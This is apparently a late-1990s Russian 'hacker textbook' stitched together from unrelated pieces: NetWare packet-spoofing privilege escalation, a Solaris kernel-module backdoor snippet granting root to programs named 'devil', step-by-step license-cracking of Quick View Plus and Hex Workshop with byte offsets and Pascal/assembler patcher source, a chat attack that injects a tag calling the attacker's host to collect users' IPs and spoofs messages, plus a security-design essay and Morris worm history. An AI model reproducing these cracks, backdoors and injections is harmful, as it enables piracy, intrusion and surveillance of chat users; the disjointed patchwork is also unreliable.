АТАКА ПО-РУССКИ

Для проверки работы алгоритма пришлось сделать новую программу. С помощью следующего нововведения удалось добиться, чтобы в сети никто не "повис". Серверу посылаются подряд 256 пакетов с разными значениями в поле Sequence Number (см. Рисунок 4). Только значение поля не увеличивается, а уменьшается. Следовательно, "правильный" пакет серверу придет только один, и значение счетчика пакетов на сервере увеличится только на единицу. Сервер, после того как ему приходит настоящий пакет, полагая, что ответ на предыдущий запрос станции ей не дошел, делает "откат" в счетчике пакетов и обрабатывает запрос станции снова. Но самое главное сервер не делает откат операции, которая только что была выполнена.

Рисунок 4.

Схема перехвата полномочий.

На Распечатке 1

приведен формат пакета, посылаемого подобными программами. Этот пакет эмулирует выполнение операции Equivalent To Me, позволяющей получить почти все права администратора сети (для удобства фоpмат пpиведен в опpеделениях языка ассемблеp).

Данный пример не применим в случае сети NetWare 4.x по следующим причинам. В поколении сетей 4.х введен новый тип администратора - Admin. Для совместимости с предыдущими версиями существует SUPERVISOR, но администраторы сетей его не используют, хотя функция корректно обрабатывается сервером. Также в сетях 4.х возможно отключение поддержки базы Bindery в связи с переходом к службе каталогов NDS. Имя пользователя должно быть полным - т. е. с указанием дерева и контекста (например, 3107.inf.tsu).

С учетом всего вышесказанного можно построить пакет, который будет приносить результат и в сети NetWare 4.x. Заголовки протоколов IPX и NCP можно оставить без изменений, а данные NCP могут быть такими, как на Распечатке 2.

Здесь взломщик сети получает права администратора на все дерево NDS. В том случае, конечно, если подобные права есть у самого администратора, и он работает в сети.

Следует отметить, что для получения прав администратора сети злоумышленнику в любом случае необходимо иметь доступ в сеть, хотя бы с минимальными правами.
Следовательно, потенциальным взломщиком может быть только тот, кто имеет доступ к ресурсам вашего сервера. Также, вполне вероятно, что некто получит доступ в сеть, используя чужое имя входа и пароль. Наверняка в вашей сети имеются пользователи с паролями, не соответствующими правилам безопасности. Например, у них вообще может не быть пароля или он совпадает с именем пользователя. Для выявления таких пользователей существуют различные вспомогательные программы. Одна из таких программ - chknull.exe - позволяет проверить наличие паролей и степень их безопасности. Запустив ее, вы увидите список пользователей, которые не удосужились задать пароль. С параметром -p программа проверит наличие пользователей, у которых пароли совпадают с их именами входа в сеть. Также в командной строке в качестве параметра вы можете перечислить нежелательные для применения пароли и получить список пользователей с такими паролями.

Эту программу, как и множество других, относящихся к теме безопасности NetWare, можно найти в глобальной сети Internet. Например, по адресу: http://www.tsu.ru/~eugene/, вы найдете и эти программы, и список некоторых адресов, посвященных защите сетей Novell NetWare. Но помните: программой, подобной chknull, можете воспользоваться не только вы, как администратор, но и те, кто хочет получить несанкционированный доступ в вашу сеть.

Атрибуты специальных устройств.

/dev/mem указывает на драйвер для доступа к памяти. Постановка на него атрибутов 0666 дает пользователю возможность прямой записи в память. Злоумышленник может найти proc_t структуру своего процесса и изменить его эффективный uid. {kmem_thief}

Backdoors

"Мертвый компьютер - защищенный компьютер!"

Безопасность о двух концах.

Пример выше еще раз убеждает в том, что при разработке и реализации подсистемы безопасности ВС принимаемые решения должны быть тщательно выверены и проанализированы со всех точек зрения (а не должны слепо следовать требованиям стандартов, нормативов или некоторой субъективной логики). Одну такую точку зрения я предлагаю в этой статье - ни одно решение, направленное на профилактику, затруднение, обнаружение, регистрацию, противодействие или восстановление от некоторой угрозы не должно повышать вероятность осуществления другой угрозы. Возможно, это требование будет самопротиворечиво в общем случае, тогда необходимо его уточнить так, что угрозы, вероятность осуществления которых может повыситься, не должны быть более опасными.

Понятие "опасности" угрозы также нельзя, видимо, определить в общем случае (можно очень долго дискутировать, что, например, является более опасным - раскрытие или уничтожение информации, да это и не является целью данной статьи), но ранжирование угроз по степени опасности можно проводить, исходя из задач защищенной вычислительной системы. Для подавляющего большинства защищенных систем общего назначения, впрочем, можно признать, что из трех основных классов угроз: раскрытия, целостности и отказа в обслуживании, - последняя является наименее опасной.

Таким образом, если условно разделить функции подсистемы защиты на (см. рис. 1):

профилактику (предотвращение)

затруднение

обнаружение

противодействие (отражение)

регистрацию (учет)

восстановление

то для каждой из них можно придумать такие вполне вероятные способы внедрения, которые будут нарушать сформулированный выше принцип.

Рис. 1. Функции подсистемы защиты.

К наиболее распространенным и универсальным (могущим существовать во многих ВС) я бы отнес следующие сценарии нарушения безопасности, использующие сами средства защиты (цифры соответствуют предыдущему списку):

1.1. Предотвращение угрозы приводит к событию, которое является более уязвимым (нештатным) по сравнению с плановой работой системы.
Этими событиями могут быть перезагрузки машины, переинициализации подсистемы безопасности и т.п. (см. пример 2 - использование механизма смены паролей для атак на подсистему аутентификации).

1.2. Предотвращение угрозы требует значительных ресурсов ЭВМ, из-за чего систему легче подвергнуть отказу в обслуживании (см. пример 5 - использование шифрования трафика для атак отказа в обслуживании).

2. Затруднение угрозы приводит к установке таких атрибутов безопасности, которые являются неприемлемыми для пользователей этой системы, что приводит к отключению или фактическому сведению на нет системы защиты (см. пример 4 - установка минимальной длины пароля для атак на криптографическую подсистему).

3. Система обнаружения угроз имеет такие расплывчатые признаки угрозы, что ее постоянное срабатывание приводит к ее полному отключению (пример - резидентные антивирусные блокировщики первого поколения, доводившие пользователя до исступления вопросами "Разрешать запись в файл XXX (Д/Н)?").

4.

4.1. Система противодействия реализована так, что она останавливает систему в крайнем случае с целью не допустить потери информации в ней. Тогда хакер может смоделировать "крайний случай" и система выйдет из строя.

4.2. Система активного противодействия может пытаться заблокировать или уничтожить систему, с которой происходит атака. Злоумышленник может подменить адрес, с которого происходит атака, на адрес самой системы.

4.3 Противодействие системы может быть направлено против ее администратора, отвечающего за отражение атаки. (см. пример 1 - блокирование ресурса администратора и невозможность противодействия им другим атакам).

5. Использование системой регистрации значительных ресурсов ЭВМ, из-за чего происходит отказ системы (см. пример 3 - переполнение файла регистрации событий, приводящее к отказу в обслуживании).

6. Предположим, что система восстановления поле атаки восстанавливает "ядро" системы из некого резервного источника. Но, если в результате атаки хакер сможет внедрить "троянского коня" непосредственно в резервную копию, то в результате такого восстановления эта закладка попадет в реально работающую систему.

Далее будет рассмотрен ряд примеров, иллюстрирующий эти сценарии.

Действующие лица

Десять лет назад, 2 ноября 1988 года, приблизительно в пять часов вечера на одном из компьютеров Массачусетского Технологического института был запущен знаменитый "Червь".

Это было беспрецедентное событие, первая в истории Интернета заранее спланированная атака. С тех пор сообщения о подобных инцидентах поступают с удручающей частотой. Но история первой атаки по-прежнему интересна - и как беспрецедентное событие, и потому, что люди, в отличие от программ, изменились не сильно.

Итак, что же произошло 2 ноября 1988 года? Главные действующие лица этой истории - не только люди, но и особые программы - "Червь" и "демоны". Что вообще, такое "демон"? Что такое "вирус"? Что такое "червь"?

Пользователи, как правило, привыкли иметь дело с так называемыми интерактивными программами. Интерактивная программа - это программа, которая получает от пользователя запросы и выдает на них какие-то ответы. "Демон" же с пользователем непосредственно не общается. Дело в том, что часто бывает нежелательно, а иногда и просто невозможно физически открыть интерактивной программе доступ к той информации, которая нужна ей для работы. В этом случае используются технологии, называемые "Клиент-Сервер", Программа-клиент интерактивно общается с пользователем, программа-сервер, или "демон", общается с программой-клиентом и обрабатывает полученные от нее запросы.

Говорят, что термин "демон" (daemon) пошел от аббревиатуры Disk And Execution MONitor - Монитор Диска и Исполнения, но, откуда бы этот термин не взялся, он стал означать программу, не способную взаимодействовать с пользователем напрямую.

Собственно, именно "демоны" обслуживают сервисы Интернета. Наиболее важными действующими лицами этой истории из "демонов" являются Сендмейл (Sendmail) - почтовый демон, и фингерди (fingerd) - демон специальной услуги, называемой "фингер" - палец (finger).

Функции сендмейла заключаются в приеме электронной почты и информации о том, кто и кому ее послал.
Он же осуществляет рассылку.

Фингерди, демон гораздо более простой, понимает специальные запросы - на вопрос о пользователе отвечает, когда тот в последний раз регистрировался в системе, когда в последний раз читал почту и так далее.

Что такое вирус? Вирус - это программа, распространяющая себя на компьютере. Как правило, это делается путем модификации некоторых исполняемых файлов - вируc "добавляет" себя к программе.

Термин "вирус" произошел из научной фантастики, но удручающе быстро стал часто встречаться в реальности. К компьютерам этот термин был приложен впервые в 1983 году, Фредом Кохеном. По его утверждению, он написал первого вируса в процессе подготовки докторской диссертации, третьего ноября 1983 года - по иронии судьбы, почти ровно за пять лет до Червя. Впрочем, к теме данной статьи вирусы имеют лишь косвенное отношение. Тип программ, к которым принадлежал Червь Морриса, так и называется - черви.

Что такое червь? Червь - это программа, созданная для того, чтобы работать на нескольких компьютерах, копировать себя из машины в машину и там запускать. Впервые термин "Червь" был использован в 1975 году в научной фантастике. До 88-го года многие корпорации, такие, как Xerox, экспериментировали с разделяемыми задачами. К примеру, весьма известен в то время был червь, названный Вампиром. Вечером, когда люди уходили из лаборатории, он запускал процессы, требующие больших затрат ресурсов компьютера. Утром, прежде чем сотрудники возвращались, он сохранял состояние задач и освобождал компьютеры. Кстати, с одним из подобных червей была связана первая проблема, похожая на атаку "Червя". Из-за ошибки в программировании он не прекратил свою работу утром. Более того, когда машины выключали и включали снова, черви из соседних компьютеров запускали свои копии на вновь включенные, срывая таким образом работу. Однако, во-первых, эти черви не были предназначены для таких действий (это был их внештатный режим); во-вторых, все это происходило в локальной сети, в зоне ответственности одного администратора, и все было под рукой - но 2 ноября была запущена, наверное, не имевшая себе аналогов, агрессивная и живучая программа.

Добавление или модификация демонов.

Системные демоны обычно запускаются при старте системы из /etc/rc?.d/ файлов или при помощи мета-демона inetd. В эти файлы можно добавить старт своего демона. Для затруднения обнаружения посторонних соединений путем прослушивания сети или обмана firewalla чужая программа может использоваться UDP протокол или ICMP пакеты.

Добавление модулей в ядро.

Взломщик может добавить свой модуль в ядро и перехватить какой-либо из системных вызовов, скажем, SYS_setuid.

SYS_setuid Solaris 2.6 .... proc_t p; user_t ut; int my_setuid(uid_t uid) { int rval;

p = ttoproc(curthread); mutex_enter(&p->p_lock); up = prumap(p); rval = bcmp(up->u_comm, "devil", 5); (void)prunmap(p); mutex_exit(&p->p_lock); if( rval) { rval = setuid(uid); } else { ... } return 0; } ....

Теперь достаточно переименовать свою программу в devil* и вызвать setuid для получения uid = 0.

ДРУГИЕ АСПЕКТЫ БЕЗОПАСНОСТИ

Функция disconnect, обрывающая связь сервера с клиентом с помощью всего лишь одного пакета, также осталась незащищенной. Любой пользователь сети может незаметно "выкинуть" другого (даже администратора) и наслаждаться сделанной мелкой пакостью, а иногда и не мелкой (например, если в это время шел процесс резервного сохранения данных).

В заключение статьи хотелось бы сказать несколько слов о паролях в сетях NetWare. Дело в том, что узнать пароль можно только лишь при определенных условиях с помощью программы-перехватчика, которая запоминает комбинацию клавиш. Тех, кто думает, что пароль посылается по сети (а таких немало), спешим разочаровать: в NetWare этот недостаток свойственен только программам доступа к консоли сервера NetWare и регистрации пользователей Macintosh. Следовательно, заботой администратора в данной области защиты является периодическая проверка на наличие паролей.

Многие из старых ошибок уже не актуальны в последней версии IntranetWare, но в России эта система пока не получила такого распространения, как NetWare 3.x или NetWare 4.1. Многие сетевые администраторы не хотят переходить на новую систему либо по причине ее кажущейся сложности (хотя это далеко не так), либо по причине отсутствия средств, но не самое ли лучшее вложение денег - в будущую стабильность и надежность?

Учебник хакера

УЧЕБНИК ХАКЕРА

Введение

Взлом Windows-приложений

Взлом WWW-сервера на основе WebSite v1.1x

Некоторые аспекты атаки по словарю

"Сладкая Булочка" или "Ой, а что с моим компьютером?"

Руководство Soft-Ice

SoftIce в действии

О "взломах" html-чатов

Безопасность против безопасности

Первый удар

Как был взломан "Релком-Украина"

Backdoors

Черный ход в NetWare

Странички истории, или как действительно был взломан Сити-Банк

Исследования Intranet-сети компании PepsiCola International

ГОЛЛАНДСКАЯ АТАКА

На принципе подстановки пакетов была основана так называемая голландская атака, придуманная группой голландских студентов. Существует несколько версий реализации подстановки пакетов. Наиболее известная в России программа написана на ассемблере русским программистом, вместе с ней распространяется файл, содержащий описание ее работы. Эту программу автор статьи довольно часто встречал в сети своего университета, особенно у студентов первого и второго курсов. Теоретически у того, кто ее запустит, должны появиться все права на сервер - эквивалент SUPERVISOR (программа писалась для NetWare 3.x). Но у нее существует несколько недостатков.

Для успешного ее выполнения SUPERVISOR должен находиться в сети. Программа не пытается выяснить номер соединения администратора с сервером, а перебирает всех пользователей сети подряд, пока не получит результат. После выполнения программы в сети (кроме взломщика) останутся те, кому повезло (номера их соединений с сервером оказались больше, чем у администратора). Остальным (включая администратора) придется входить в сеть заново.

Автор этих строк еще не видел, чтобы данная программа работала. В ее коде существует несколько ошибок, из-за которых она "виснет" или просто не работает.

HACKING

ВЗЛОМ WINDOWS-ПРИЛОЖЕНИЙ

Для начала я научу вас пользоваться W32Dasm. Я не хочу вам давать детальную помощь, как делать краки, но я могу научить вас самим добывать себе умения и навыки взлома.

Когда вы используете W32Dasm, знайте, что он не даст вам серийные номера или коды, он лишь покажет путь, где находится место, где можно эти номера вводить. То, что я делаю каждый день при взломе программ, будет описано в этом справочнике, шаг за шагом.

ИНСТРУМЕНТЫ :

из инструментов взлома вам нужно следующее : W32Dasm 8.5 или боолее позднюю версию, Hacker's View 5.24, Norton Commander (я позднее объясню, почему я его использую).

Turbo Pascal 7.0

TASM и TLINK 3.0

ЧАСТЬ 1 : Как кракнуть Quick View Plus 4.0

Шаг 1. Запустите ORDER32.EXE

Шаг 2. Кликните на $49 Single User License (вы можете кликнуть и на $59), затем ACCEPT, потом UNLOCK BY PHONE.

Шаг 3. Введите любой код для получения сообщения об ошибке (вы должны записать это сообщение), потом выйдите из программы, кликнув на CANCEL.

Шаг 4. Запустите Norton Comander, перейдите в директорию QVP.

Шаг 5. Скопируйте ORDER32.EXE в ORDER32.EXX (для сохранности), а затем скопируйте ORDER32.EXE в 1.EXE

(для использования в W32Dasm).

Шаг 6. Запустите W32Dasm и раздессимблируйте 1.EXE.

Шаг 7. После этого, кликните на STRING DATA REFERENCE, найдите там сообщение "You have entered an incorrect code.Please check your entry" (вы должны помнить,что это было сообщение об ошибке) и дважды щелкните мышью по нему.

Шаг 8. Закройте SDR окно. Вы должны увидеть сообщение:

* Possible reference to String Resource ID=00041: "You have entered...

:004049F8 6A29 push 00000029

:004049FA FF353CCE4000 push dword ptr [0040CE3C]

Шаг 9. ОК, теперь вы должны найти последнее сравнение типа CMP,JNE, JE,TEST и т.д. перед сообщением об ошибке.

Нажимайте стрелку "вверх", пока не найдете :

:004049CD 755A jne 00404A29

* Possible reference to String Resource ID=00032: "You must select...

:004049CF 6A20 push 00000020

...

* Possible reference to String Resource ID=00040: "Unlock Error"

Шаг 10. Теперь вы знаете, куда идет скачок при введении неправильного кода. Теперь можно посмотреть, что произойдет, если "jne" на "je". Убедитесь, что зеленая полоска находится на надписи:

004049CD 755A jne 00404A29, вы должны увидеть Offset address внизу на статусной строке типа

@Offset 00003DCDh Это место, где вы можете внести изменения в ORDER32.EXE.

Шаг 11. Перейдите обратно в Norton Commander, запустите HIEW ORDER32.EXE, нажмите F4 для выбора режима декодирования (Decode Mode), нажмите F5 и введите 3DCD.

Вы должны увидеть следующее :

00003DCD: 755A jne 000003E29

00003DCF: 6A20 push 020

00003DD1: FF15 call w,[di]

Шаг 12. Это то место, где вы можете изменить байты, нажмите F3, введите 74, нажмите F9 для обновления ORDER32.EXE. Выйдите из HIEW.

Шаг 13. Запустите ORDER32.EXE, введите любой код. Ура ! Мы сломали QVP 4.0 !

Но ! Что будет, если ввести настоящий серийный номер ? Появляется сообщение об ошибке ! Что это ?

Шаг 14. Снова запустиите HIEW ORDER32.EXE, нажмите F4, выберите Decode, нажмите F5 и введите 3DCD. Нажмите F3, введите EB, нажмите F9. Вы прямо "прыгнете" на Unlocked диалог.

ЧАСТЬ 2 : Как кракнуть Hex WorkShop 2.51

Шаг 1. Запустите HWORKS32.EXE

Шаг 2. Кликните на HELP, About HEX Wo..

Шаг 3. Введите любой код, чтобы получить сообщение об ошибке (вы должны записать это сообщение) и выйдите из программы.

Шаг 4. Запустите Norton Commander, перейдите в директорию HWS.

Шаг 5. Скопируйте файл HWORKS32.EXE в HWORKS32.EXX

(для сохранности) и скопируйте файл HWORKS32.EXE в 1.EXE (для использования в W32Dasm).

Шаг 6. Запустите W32Dasm и "разберите" 1.EXE.

Шаг 7. После этого, нажмите мышью на FIND TEXT, введите

"You have entered an" (вы должны помнить, что это сообщение об ошибочно введенном серийном номере) и найдите соответствующую строку (вы не сможете сделать это в SDR-окне !)

Шаг 8. Вы должны увидеть следующую строку :

Name: DialogID_0075, # of Controls=003, Caption:

"Registration Unsucce..

001-ControlID:FFFF, Control Class:""Control Text:"You have entered an..

002-ControlID:FFFF, Control Class:""Control Text:"Please confirm you..

Шаг 9. Оk, теперь вы знаете, что ControlID будет использоваться, когда вы введете неверный код. Кликните FIND TEXT, введите "dialogid_0075" и вы найдете:

* Possible reference to DialogID_0075

:0041E233 6A75 push 00000075

:0041E235 8D8D10FFFFFF lea ecx, dword ptr [ebp+FF10]

Шаг 10. Теперь вы должны поискать последнюю ссылку, типа

CMP, JNE, JE и пр. перед диалогом об ошибке. Нажимайте клавишу "вверх", пока не найдете :

:0041E145 837DEC00 cmp dword ptr [ebp-14], 00000000

:0041E149 0F8479000000 je 0041E1C8

:0041E14F 8B8DFCFEFFFF mov ecx, dword ptr [ebp+FEFC]

Шаг 11. Теперь вам нужно посмотреть, что произойдет, если "je" заменить на "jne". Убедитесь, что зеленая полоска установлена на строке

:0041E149 0F8479000000 je 0041E1C8.

Вы должны на нижней статусной строке увидеть оффсетный адрес, типа : @Offset0001D549h. Это то место, где вы сможете кракнуть HWORKS32.EXE

Шаг 12. Перейдите обратно в Norton Commander, запустите HIEW HWORKS32.EXE, нажмите F4 для выбора режима декодирования (Decode Mode), нажмите F5 и введите

ID549.

Вы должны увидеть следующее :

0001D549: 0F847900 je 00001D5C6 ---------- (1)

0001D54D: 0000 add [bx][si],al

0001D54F: 8B8DFCFE mov cx,[di][0FEFC]

Шаг 13. Это то место, где вы сможете изменить несколько байтов, нажмите F3, введите 0F85, нажмите F9 для обновления файла HWORKS32.EXE. Выйдите из HIEW.

Шаг 14. Запустите HWORKS32.EXE и введите любой код, работает ? НЕТ !?!??!?!

Хе-хе-хе... Не волнуйтесь ! Снова перейдите в Нортон.

Скопируйте HWORKS32.EXX в HWORKS32.EXE (теперь

вы видите, почему я делаю копию файла с расширением

ЕХХ для сохранности). Теперь перейдите в W32Dasm, вы

должны перейти туда, где только что были (на 0041У145).

Шаг 15. Нажмите F3 для очередного поиска "DialogID_0075", вы должны найти :

* Possible reference to DialogID_0075

:00430ADD 6A75 push 00000075

:00430ADF 8D8D10FFFFFF lea ecx, dword ptr [ebp+FF10]

Шаг 16. Ok, теперь вы теперь можете посмотреть на последние ссылки, типа CMP, JNE, JE и т.д. перед диалогом об ошибке. Нажимайте стрелку вверх, пока не найдете :

:004309EF 837DEC00 cmp dword ptr [ebp-14], 00000000

:004309F3 0F8479000000 je 00430A72

:004309F9 8B8DFCFEFFFF mov ecx, dword ptr [ebp+FEFC]

Шаг 17. Теперь вы можете посмотреть, что произойдет, если "je" заменить на 'jne". (это должно сработать). Переместите

полоску на :004309F3 0F8479000000 je 00430A72. На статусной строке внизу экрана вы должны следующее:

@Offset0002FDF3h (оффсетный адрес). Это то место, где

вы сможете кракнуть HWORKS32.EXE.

Шаг 18. Перейдите в Norton Commander, запустите HIEW

HWORKS32.EXE, нажмите F4 для выбора Decode Mode

(ASM), нажмите F5 и введите 2FDF3. Вы должны увидеть:

0002FDF3: 0F847900 je 00001D5C6 ---------- (1)

0002FDF7: 0000 add [bx][si],al

0002FDF9: 8B8DFCFE mov cx,[di][0FEFC]

Шаг 19. Это то место, где вы сможете изменить несколько байтов, нажмите F3, введите 0F85, нажмите F9 для обновления файла HWORKS32.EXE. Выйдите из HIEW.

Шаг 20. Запустите снова HWORKS32.EXE и введите любой код. Работает ? Виола !!! Поздравляю !!! Вы кракнули HEX

WorkShop 2.51 !

ЧАСТЬ 3 :Как сделать собственный патч

Здесь напечатан исходный код на Паскале :

------------------------<cut here>-------------------------------------------

Uses Crt;

Const A: Array[1..1] of Record {<-------- 1 byte to be patched}

A : Longint;

B : Byte;

End =

((A:$3DCD;B:$EB)); {<--------------- offset "3DCD" and byte "EB" to be changed}

Var Ch:Char;

I:Byte;

F:File;

FN:file of byte;

Size:longint;

Begin

Writeln('TKC''s Little Patch');writeln('Crack for QVP 4.0 by TKC/PC ''97');

Assign(F,'ORDER32.EXE'); {<-------------- filename to be patched}

{$I-} Reset(F,1); {$I+}

If IOResult <> 0 then

begin

writeln('File not found!');

halt(1);

end;

For I:=1 to 1 do {<---------------------- 1 byte to be patched}

Begin

Seek(F,A[I].A);

Ch:=Char(A[I].B);

Blockwrite(F,Ch,1);

End;

Writeln('File successfully patched!');

End.

------------------------<cut here>-------------------------------------------

Here's the source code for Assembler:

------------------------<cut here>-------------------------------------------

DOSSEG

.MODEL SMALL

.STACK 500h

.DATA

.CODE

PatchL EQU 6

Buffer Db PatchL Dup(1)

handle dw ?

intro db "TKC's Little Patch",0dh,0ah,"Crack for QVP 4.0 by TKC/PC '97$"

FileName db "ORDER32.EXE",0 ;<------- filename to be patched

notfound db 0dh,0ah,"File not found!$"

cracked db 0dh,0ah,"File successfully patched. Enjoy!$"

Cant db 0dh,0ah,"Can't write to file.$"

Done db "File has been made.$"

String db 0EBh,0 ;<------------- byte "EB" to be patched

START:

mov ax,cs

mov ds,ax

mov dx,offset intro ;point to the time prompt

mov ah,9 ;DOS: print string

int 21h

jmp openfile

openfile:

mov ax,cs

mov ds,ax

mov ax,3d02h

mov dx,offset FileName

int 21h

mov handle,ax

cmp ax,02h

je filedontexist

jmp write

filedontexist:

mov ax,cs

mov ds,ax

mov dx,offset notfound

mov ah,9 ;DOS: print string

int 21h ;display the time prompt

jmp exit

Write:

mov bx,handle

mov cx,0000h

mov dx,3DCDh ;<------------- offset "3DCD"

mov ax,4200h

int 21h

mov cx,patchl

mov dx,offset String

mov ah,40h

mov cx,01h

int 21h

mov ax,cs

mov ds,ax

mov dx,offset cracked

mov ah,9 ;DOS: print string

int 21h ;display the time prompt

jmp Exit

Exit:

mov ah,3eh

int 21h

mov ax,4c00h

int 21h

END START

--------------------------<cut here>-----------------------------------------

Заключительные слова :

Здесь несколько важных функций, используемых для крака :

Hex: Asm: Means

75 or 0F85 jne jump if not equal

74 or 0F84 je jump if equal

EB jmp jump directly to

90 nop no operation

77 or 0F87 ja jump if above

0F86 jna jump if not above

0F83 jae jump if above or equal

0F82 jnae jump if not above or equal

0F82 jb jump if below

0F83 jnb jump if not below

0F86 jbe jump if below or equal

0F87 jnbe jump if not below or equal

0F8F jg jump if greater

0F8E jng jump if not greater

0F8D jge jump if greater or equal

0F8C jnge jump if not greater or equal

0F8C jl jump if less

0F8D jnl jump if not less

0F8E jle jump if less or equal

0F8F jnle jump if not less or equal

Ваши небольшие знания по Ассемберу, вам, естественно, помогут, и они вам потребуются для использования Soft-ICE. Кроме того, вы сможете кракать эти куски с помощью W32Dasm как маньяк :-) Вы не сможете дизассемблировать программы на Visual Basic, для него вам понадобятся специальные декомпилеры.

Удачи !

Htmlcht

О "взломах" html-чатов

Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение.

Начал я с малого.

В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа <input type=hidden name=cookie value=SP202134> (так в партизанах хранится UserID)

Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь www.chat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа <input type=text name=cookie value=SP202134> (что бы можно было их изменять) После этого делаем HTML документ для "сборки чата" из кусков. Т.е. примерно так

"First.htm" <html> <frameset rows="80%,20%"> <frameset cols="70%,30%"> <frame name="razg" src="http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end"> <frame name="rigt" src="http://www.chat.nsk.su/right.html"> </frameset>

Start.htm - это и есть тот фрейм который я сохранил и изменил

После этого я просто броузером открывал эту страницу (First.htm). И сразу(!!!) попадал в чат, минуя стандартную процедуру входа. Это позволило :

1. Обходить зарегистрированные имена

2. Прятать свой IP от киллеров, за счет взятия чужого ID'a

Дальше мне стало интересно вычислить IP участников. Я обнаружил, что не запрещён тэг <bgsound src="">. Это позволило вставлять в своё сообщение ресурс со своей машины. Сам по себе звук на хер не нужен, но этот косяк позволил вставить в свой месс строку типа <bgsound src="http://MyIP/cgi-bin/spy.exe">. Этот скрипт (spy.exe) вызывался с машины КАЖДОГО участника чата. Это позволило увидеть IP всех (скрипт просто сохранял мне на винт данные из переменной окружения REMOTE_ADDR).
Это мне не очень понравилось, тк не понятно было где чей IP. Примерно в это-же время в чате появились приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал называться по другому.

До приватов :

http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end

После появления приватов :

http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end

Где SP456789 - UserID

После этого в скрипт (spy.exe) был добавлен вывод ID'a из переменной окружения HTTP_REFERER Ну а сопоставить ник с ID'ом не проблемма, тк ID каждого прописан там же примерно в такой строке

<br><b><font color=yellow size=-1>Тут ник</font></b> <font color=black><a href="/cgi-bin/private_form.cgi?SP448188"> <img src=/img/mes.gif border=0 vspace=0></a></font>

(Это строка взята из правого фрейма, где можно вызвать функцию "Кто в чате")

После этого перестало быть проблемой сопоставление ника и IP. Затем я решил позабавиться с приватами.

Используя метод сохранения странички на винт (описанный выше), я получил форму для отправления приватов от КОГО-ТО КОМУ-ТО. Т.е. я смог в отсылаемом приватно сообщении проставлять имя отправителя.

Осталось только одно. Я знал, что в чате есть киллеры, но ничего не знал про то, что это, где это, как это. Знал только, что для того, чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой киллерской страничке показываются имена. Я предположил, что моё имя показываются таким, каким я его ввожу. Исходя из этого, я под именем <bgsound src="http://MyIP/cgi-bin/spy.exe"> MyNick зашел в чат (через прокси), и начал легонько ругаться (мне надо было, чтобы киллеры зашли на свою страничку). После этого (когда меня убили) я разгреб лог моего ВебСервера (OmniHTTPd beta) и увидел там обращение со страници не относящейся к известным мне страницам чата. Я полез на эту страницу и получил запрос на ввод пароля, со словами "Дорогой администратор...".Это приятно согрело душу. Дальше я начал думать, то ли подобрать пароль, то ли ещё что придумать. Но ситуация так сложилась, что я оказался в одной сети с киллером, и, запустив сниффер, я поимел пароль.

Ну вот и все.

INTRO

Введение

Перед Вами уникальный в своем роде учебник, который в этом виде выходит впервые! В нем собрана и структурирована вся актуальная на сегодняшний день информация, которая может быть полезна как начинающему так и "бывалому" хакеру. Мы постарались включить сюда самые последние достижения в области хака и крака. В учебнике затрагиваются практические примеры крака программ с использованием наиболее известных дебаггеров, конкретные примеры взлома интернет-сайтов, web-chat'ов. Также можно узнать все про Backdoor ("черный вход") на интернет-сайты требующие предварительной регистрации. В учебник включено руководство Soft -Ice. Все материалы на русском языке!!!

История Червя: даты и время

2 ноября

примерно 17:00

Червь запущен

примерно 18:00

Машина prep.ai.mit.edu, машина с открытым доступом, заражена.

18:30

Зараженная машина Питтсбургского Университета заражает машины корпорации RAND

21:00

Червь в Стэнфорде

21:30

Первая машина в Университете штата Миннесота заражена

22:04

Калифорнийский Университет, Беркли. Майк Карелс и Фил Лапсли вскоре обнаружили Червя по необычно высокой загрузке машины.

22:40-23:40

Северная Каролина, SRI, Университет Карнеги-Меллона, Университет Мэрилэнда, Университет Пенсильвании, Массачусетский Технологический... Червь победоносно шагает по Сети.

23:40

В Беркли понимают, что атака ведется через rsh и sendmail. В качестве меры предосторожности, начинается блокирование сетевых сервисов.

23:45

Машины Лаборатории Баллистических Исследований заражены

23:49

Заражены машина Университета штата Юта, в течение следующего часа загрузка возросла до 100.

3 ноября

до 2:00

Продолжается заражение...

2:38

Peter Yee посылает в список рассылки TCP-IP сообщение “Нас атакуют”

3:34

Анонимный постинг в TCP-IP, вкратце описывающий, как остановить Червя. Автор постинга (Andy Sudduth) послал это сообщение после телефонного разговора с Моррисом, но, из-за перегрузки сетей и компьютеров, письмо не было отослано в течение примерно суток

примерно 4:00

Университет штата Колорадо и Университет Пурдью атакованы